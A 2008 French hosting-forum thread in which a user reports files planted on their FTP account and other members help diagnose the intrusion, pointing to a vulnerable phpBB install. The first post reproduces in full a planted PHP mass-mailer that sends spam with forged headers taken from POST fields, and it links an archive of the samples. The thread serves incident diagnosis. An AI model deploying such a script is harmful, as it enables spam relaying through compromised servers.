Auteur Sujet: Pseudo-hack de mon compte  (Lu 2789 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Pseudo-hack de mon compte
« le: 27 octobre 2008 à 23:34:20 »
Bonsoir,

En me connectant sur mon ftp ce soir, telle n'a pas été ma surprise de constater la présence de certains fichiers ne m'appartenant pas à la racine de celui-ci: un fichier "test.php", "default.php", "error.php", et d'autres contenant tous le code suivant:

<?
///////////////////////GET ENV//////////////////////////////////////////////////
if (isset($_POST['action']))
{
$action=$_POST['action'];
}
else
 {
 print "<h1>Under construction!!!</h1>";
 exit;
 }
 
if ($action=="test")
 {
 print "test_ok";
 exit;
 }

if ($action=="send")
 {
  $from             = $_POST['from'];
  $subject          = $_POST['subject'];
  $message          = $_POST['message'];
  $emaillist        = $_POST['emaillist'];
  $random_mail      = $_POST['random_mail'];
  $random_name      = $_POST['random_name'];
  $realname         = $_POST['realname'];
  $replyto          = $_POST['replyto'];
  $random_reply     = $_POST['random_reply'];
  $subject          = $_POST['subject'];
  $random_sabj      = $_POST['random_sabj'];
  $mailfilename     = $_POST['mailfilename'];
  $mails_from_file  = $_POST['mails_from_file'];
  $log_to_file      = $_POST['log_to_file'];
//////////////////////CHECK DATA////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////
    $to = ereg_replace(" ", "", $to);
    $message = ereg_replace("&email&", $to, $message);
    $subject = ereg_replace("&email&", $to, $subject);

    $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
    $header .= "MIME-Version: 1.0\r\n";
/*    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
    If ($file_name) $header .= "--$uid\r\n";*/
    $header .= "Content-Type: text/$contenttype; Charset=windows-1251\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= "$message\r\n";
/*    If ($file_name) $header .= "--$uid\r\n";
    If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
    If ($file_name) $header .= "$content\r\n";
    If ($file_name) $header .= "--$uid--";*/
    mail($to, $subject, "", $header);
print "ok";
}
?>


un code d'envoi de mail donc ....

il y avait aussi un fichier "php.php" qui listait tout le contenu de mon ftp, ainsi qu'un fichier html, "canadian.html" renvoyant vers un site pharmaceutique spécialisé dans les problèmes d'érection (ben voyons) ...


Tous ces fichiers étaient également présents dans le dossier "www", accessibles donc, et exploitables ....

J'ai évidemment supprimé tous ces fichiers, mais en est conservé une sauvegarde afin de vous les faire partager (voir si je suis le seul dans le cas):

http://rave.alwaysdata.net/fichiers_ph.rar


Tous les autres sous dossiers étaient "intactes" (je précise que rien n'a été supprimé).


Je ne comprends PAS comment cela a-t-il pu arriver, je ne possède PAS de site. mes fichiers ne sont PAS listés et je suis le seul ayant accès à la racine du ftp.


Comment dois-je interpréter ça ?


Aux autres membres: vérifiez vos sites!

« Modifié: 27 octobre 2008 à 23:35:59 par rave »

Hors ligne Just

  • Expert
  • ****
  • Messages: 924
    • AiN-IRC LE portail du 01 [Ain]!
Re : Pseudo-hack de mon compte
« Réponse #1 le: 28 octobre 2008 à 08:43:12 »
Salut,

Etrange...
Par hasard tu n'aurai pas répondu à la "fausse" demande du "faux" PHPNET par e-mail te demandant tes accès ?
Ou bien ton mot de passe FTP actuel ne te servirait t'il pas pour d'autres sites ?

Enfin dernière hypothèse : un keyloger sur ta machine... ?
Just OnMyOwn ... :B
"Be CoOl, KeEp CoOl, HaVe FuN!"
-
http://www.ain-irc.net/
http://www.funpart.net/

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #2 le: 28 octobre 2008 à 13:32:05 »
Merci pour la réponse.


Je n'ai pas répondu aux faux mails non, je n'en ai d'ailleurs pas reçu (mais j'ai l'habitude de ce genre de mail, en qui je ne fais jamais confiance bien sûr).

Pour ce qui est du keyloger, je n'y avais pas pensé, mais ça ne doit pas être ça, je ne tape jamais mes mots de passe (je ne les connais pas moi même, j'ai fais expres d'en prendre des bien compliqué pour les recopier sur une feuille ^^, ils sont enregistrés dans les paramètres du client ftp).


HA! que vois-je ce matin, un des fichier a réapparu !

Je vais changer tous mes accès et vérifier chaque script ...


Les gens ont vraiment que ça à faire ....

Hors ligne Just

  • Expert
  • ****
  • Messages: 924
    • AiN-IRC LE portail du 01 [Ain]!
Re : Pseudo-hack de mon compte
« Réponse #3 le: 28 octobre 2008 à 13:40:09 »
Il y a forcément une faille quelquepart... je croyais que tu n'avais pas de site sur ton FTP ?
Pourtant tu dis devoir "vérifier chaque script".
La source première d'intrusion c'est en effet les failles dans des scripts "connu".
Just OnMyOwn ... :B
"Be CoOl, KeEp CoOl, HaVe FuN!"
-
http://www.ain-irc.net/
http://www.funpart.net/

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #4 le: 28 octobre 2008 à 13:53:00 »
Je n'ai pas de site non, du moins pas de page visible.

Mes scripts sont des script accessibles via un programme pour un projet de traduction en groupe. Pourtant tout y est méchamment protégé et inaccessible ...  je ne comprends pas trop.


Ha je viens de remarquer qu'un de mes amis à en effet installer un forum phpbb. J'espère que ça vient de là, ça me rassurerait :p



merci ;)

Hors ligne Just

  • Expert
  • ****
  • Messages: 924
    • AiN-IRC LE portail du 01 [Ain]!
Re : Pseudo-hack de mon compte
« Réponse #5 le: 28 octobre 2008 à 14:04:08 »
PHPBB est le pire qui existe en matière de faille... tu diras à ton amis de se tourner vers un SMF ou autre PunBB !
PHPBB est d'un autre age ^^.

Ma main à couper (c'est une expression :p) que cela vient de là.
Sinon, tu soulèves le fait que "un de tes amis a installé"... ce qui insinue donc que cette personne à accès au FTP, et a potentiellement délivré ce mot de passe à un ou plusieurs tiers de X ou Y manière, volontairement ou non.

Bon courage.
Just OnMyOwn ... :B
"Be CoOl, KeEp CoOl, HaVe FuN!"
-
http://www.ain-irc.net/
http://www.funpart.net/

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #6 le: 28 octobre 2008 à 14:13:30 »
Hum je vois je vois :p

Je connaissais l'expression, on l'utilise souvent en belgique ^^


Pour l'accès ftp, il n'a accès qu'à un sous dossier (un sous-domaine) et non à la racine, mais tu as peut être raison, je vais changer tout ça.

Je me débarrasse vite fait de phpbb ^^


Re-merci ;)

Hors ligne Just

  • Expert
  • ****
  • Messages: 924
    • AiN-IRC LE portail du 01 [Ain]!
Re : Pseudo-hack de mon compte
« Réponse #7 le: 28 octobre 2008 à 14:33:25 »
Je t'en pris, je n'ai finalement rien fait :P !

En espérant que tes problèmes se résolvent rapidement.
Bonne continuation !
Just OnMyOwn ... :B
"Be CoOl, KeEp CoOl, HaVe FuN!"
-
http://www.ain-irc.net/
http://www.funpart.net/

Hors ligne Nommam

  • Connaisseur
  • ***
  • Messages: 433
Re : Pseudo-hack de mon compte
« Réponse #8 le: 29 octobre 2008 à 08:33:40 »
Hum depuis la sortie de phpbb3, nous n'avons plus de probleme de ce genre !

Avec Confirmation d'inscription par mail, captcha, filtrage des ip nom email blacklisté, je suis tranquil, hors avant on avait jusqu'a 200 inscriptions / jours
Par contre seul les personnes bien connues on droit d'upper des fichier.

Je parie que c'était du phpBB2

Hors ligne Just

  • Expert
  • ****
  • Messages: 924
    • AiN-IRC LE portail du 01 [Ain]!
Re : Pseudo-hack de mon compte
« Réponse #9 le: 29 octobre 2008 à 09:20:35 »
Toutes ses sécurités n'empêche malheureusement pas les failles...
La seule manière d'être certains qu'un script n'est pas de failles... c'est de ne pas avoir de script ^^.

Pour ce qui est de PHPBB je reste tout de même sur mes positions : usines à gaz et boufeur de ressources.
Après chacun voit midi à sa porte :).
Just OnMyOwn ... :B
"Be CoOl, KeEp CoOl, HaVe FuN!"
-
http://www.ain-irc.net/
http://www.funpart.net/

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #10 le: 29 octobre 2008 à 21:51:33 »
Je confirme, il s'agissait bien de phpBB3, et depuis que je l'ai supprimé, les fichiers ne se sont pas renouvelés...


enfin bref ^^

Hors ligne Nommam

  • Connaisseur
  • ***
  • Messages: 433
Re : Pseudo-hack de mon compte
« Réponse #11 le: 30 octobre 2008 à 09:12:11 »
tu as la version exact ? PHPbb3.RCx ou PHPbb3.0x, va falloir que je surveille !

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #12 le: 30 octobre 2008 à 13:31:58 »
Et je peux voir ça comment ?

Hors ligne Nommam

  • Connaisseur
  • ***
  • Messages: 433
Re : Pseudo-hack de mon compte
« Réponse #13 le: 30 octobre 2008 à 13:58:54 »
dans /docs/CHANGELOG.html
il y a les modif qui ont étaient apportée depuis la dernière version, donc si les derniere modif sont apportée sur la RC8, c'est une 3.0.1

Si les dernière sont sur la 3.0.1 c'est donc une 3.0.2 donc la version actuelle !


Ou alors il faut ce connecter a l'admin du forum et sur la premiere page, il y a la version actuellement installé

Hors ligne rave

  • Débutant
  • *
  • Messages: 93
Re : Pseudo-hack de mon compte
« Réponse #14 le: 30 octobre 2008 à 18:52:29 »
C'est une 3.0.1